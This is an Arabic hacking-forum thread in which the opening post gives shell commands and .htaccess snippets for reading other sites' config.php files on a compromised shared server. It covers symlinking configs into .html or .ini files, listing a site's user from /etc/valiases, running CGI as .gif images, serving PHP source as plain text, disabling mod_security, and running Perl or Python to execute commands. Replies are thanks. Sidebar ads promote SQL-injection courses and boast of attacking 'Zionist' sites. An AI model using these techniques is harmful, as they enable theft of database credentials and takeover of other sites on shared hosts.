1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] مجموعة هتكس لتخطى مشاكل سحب الكونفق

الموضوع في 'آمن المواقع والسيرفرات' بواسطة LinuxCs, بتاريخ ‏31 مايو 2013.

كاتب الموضوع : LinuxCs المشاهدات : 3,360 الردود : 7 ‏31 مايو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    LinuxCs
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:


    ابدٱ بالسلام عليكم ورحمة الله وبركاته

    ويا هلا %:"

    ونبدأ من ال1الى ..&:"

    1- اولٱ : هاتكس لسحب الكنفق بصيغة ini

    آنشى من الشيل اختصار بــ .htaccess

    كود PHP:
     ln -/home/user/public_html/config.php conf.ini 
    ثم الهتكس
    كود PHP:
    [HTML]Options Indexes FollowSymLinks
    DirectoryIndex confi
    .htm  [/HTML
    2- سحب الكنفق عن طريق html

    كود PHP:
    ln -s home/user/public_html/config.php config.html 
    ثم الهتكس

    كود PHP:
    [HTML]Options Indexes FollowSymLinks
    DirectoryIndex config
    .htm  [/HTML
    3- php 5.2.17

    شرح تخطي حماية

    php 5.2.17

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    4 - سحب عن طريق صورة

    الهتكس

    كود PHP:
    Indexes ExecCGI  
    AddType application
    /x-httpd-cgi .gif  
    AddHandler cgi
    -script .gif 
    AddHandler cgi
    -script .gif  [/HTML]
    5 - لأستخراج يوزر الموقع

    كود PHP:
    ls -ls /etc/valiases/site.com
    Site.com / الموقع في السيرفر

    سحب الكونفق

    كود PHP:
    ln -/home/user/public_html/config.php DrKaSpEr.html
    ومن ثم نقوم بضغط الكونفق بالشيل zip ونحملة لجهازنا ونقراه بدون مشاكل

    6 - مجموعة من الهتكسات تفيد

    كود PHP:
    Options Indexes FollowSymLinks
    DirectoryIndex ssssss
    .htm
    AddType txt 
    .php
    AddHandler txt 
    .php

    كود PHP:
    options all
    DirectoryIndex Sux
    .html
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html

    كود PHP:
    AddType text/plain .php 
     AddHandler server
    -parsed .php 
      AddType text
    /plain .html 
     AddHandler txt 
    .html 
     
    Require None 
     Satisfy Any

    كود PHP:
    Options +FollowSymLinks
    DirectoryIndex Index
    .html
    Options 
    +Indexes
    AddType text
    /plain .php
    AddHandler server
    -parsed .php

    كود PHP:
    options +followsymlinks
    directoryindex sux
    .html
    options 
    +indexes
    addtype text
    /plain .php
    addhandler server
    -parsed .php
    addtype text
    /plain .html

    كود PHP:
    options all
    directoryindex sux
    .html
    addtype text
    /plain .php
    addhandler server
    -parsed .php
    addtype text
    /plain .html
    6- تخطي حماية LiteSpeed

    كود PHP:
     <Files *.php>
    ForceType application/x-httpd-php4
    </Files>
    <
    ifModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule
    إضافة

    عند مواجهت حماية قوية في أي سيرفر

    شغل بيرل عن طريق تغيير الصيغة إلى Enx or lnx

    ومع هتكس / كلها مشروحة في المنتدى /

    من خلال تشغيل بيرل تستطيع تنفيذ أي أمر على السيرفر ولو كانت الحماية on
    + php 5.2.17

    والبيثون أيضاً وهناك سكربتات تكون بلغة البيثون وتكون خاصة بتنفيذ الأوامر
    يعني لو ما ضبط البيرل البيثون موجود

    موفقين شباب وأتمنى المشاركة منكم في الموضوع

    )5:"
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    SaDaM
    rankrank
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    التصميم
    الإقامة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    بارك الله فيك ان شاء الله يستفيد الاعضاء من الموضوع.
    بالتوفيق للجميع يارب.&:":​
     


  4. غير متصل

    Egy HacKerS
    DeveloPer Plus

    عضو منذ:
    ‏1 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    19
    نقاط الجائزة:
    الوظيفة:
    HacKer
    الإقامة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    وعليكم السلام ورحمة الله

    الله يعطيك الف عافية
     


  5. غير متصل

    khaleid
    rank
    Developer

    عضو منذ:
    ‏1 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    merciiiiiiiiii
    )5:"​
     


  6. غير متصل

    ĦAML3Ŧ
    rank
    Developer

    عضو منذ:
    ‏18 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    مجهوود مميز تسلم
     


  7. غير متصل

    doome
    rank
    Developer

    عضو منذ:
    ‏27 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    مشكؤؤر حبيبي ؤاصل ابداعكـ ياكنج
     


  8. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: مجموعة هتكس لتخطى مشاكل سحب الكونفق

    مشكور استمر يا بطل ً#ٌ5oًًًُ.
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...